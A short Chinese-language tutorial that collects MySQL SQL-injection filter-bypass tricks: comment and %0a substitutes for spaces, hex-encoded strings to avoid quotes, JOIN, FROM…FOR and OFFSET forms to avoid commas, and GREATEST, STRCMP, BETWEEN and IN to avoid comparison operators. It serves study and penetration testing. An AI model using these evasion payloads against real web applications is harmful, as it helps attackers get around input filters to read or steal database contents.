一看就会的常间Mysql绕过方式

一、背景

在平时的sql注入不乏出现会一些注入语句进行过滤的情况，如对空格、引号之类的进行过滤，本文在这里就对一些平时经常用到的过滤方式进行一些总结，希望能够给到大家参考。

二、输入内容过滤

一、空格过滤

1、采用注释符的形式：/**/

从图中mysql能正确执行sql语句说明靠/**/可行的。

2、采用%0a

3、采用括号

如：select(user())from dual where(1=1)and(2=2)

二、引号过滤

直接采用十六进制的形式，直接用16进制代表整个字符串。

原始情况：

select column_name from information_schema.tables where table_name="users"

改成用十六进制的情况：

select column_name from information_schema.tables where table_name=0x7573657273

三、逗号过滤

1、join绕过简单注入语句：

UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

2、substr和mid()可以使用from for的方法

如：

select ascii(substr(database(),1,1))=115;

select ascii(mid(database(),1,1))=115;

变成

select ascii(substr(database() from 2 for 1))=115;

select ascii(mid(database() from 1 for 1))=115;

3、limit可使用offest绕过

select * from users limit 1,2;

select * from users limit 2 offset 1; 意思是跳过第一条，输出两条

4、绕过in里面的逗号：

原始:

SELECT * FROM users WHERE id IN (1,2,3);

改之后：

SELECT * FROM users WHERE id=1 OR id=2 OR id=3;

四、比较符号被过滤：

1、greatest

greatest(n1,n2,n3,...) //返回其中的最大值

2、strcmp

strcmp(str1,str2) //当str1=str2，返回0，当str1>str2，返回1，当str1<str2，返回-1

3、between and

如：

SELECT 5 BETWEEN 1 AND 10; -- 返回 1 (true)

SELECT 'c' BETWEEN 'a' AND 'z'; -- 返回1

4、in

SELECT 5 IN (1, 3, 5, 7); -- 返回 1 (true)

SELECT 'admin' IN ('user', 'guest', 'admin'); -- 返回 1

SELECT 'root' IN ('admin', 'user'); -- 返回 0 (false)

5、直接用等号

我门做比较也不一定非得用大于小于符号，也可以用等号代替使用。

aa